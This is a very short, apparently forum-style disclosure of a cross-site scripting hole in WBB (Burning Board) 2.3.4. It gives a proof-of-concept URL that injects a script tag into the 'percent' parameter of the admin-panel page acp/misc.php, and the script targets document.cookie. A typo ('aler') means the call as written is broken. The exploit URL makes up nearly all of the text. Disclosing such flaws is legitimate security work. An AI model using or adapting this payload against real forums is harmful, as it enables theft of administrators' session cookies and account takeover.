there is an xss in wbb 2.3.4 example: http://example.com/wbb/acp/misc.php?sid=yoursessionid&action=workingtop&taskname=Backup%20Database&percent=<script>aler(document.cookie)</script> thnx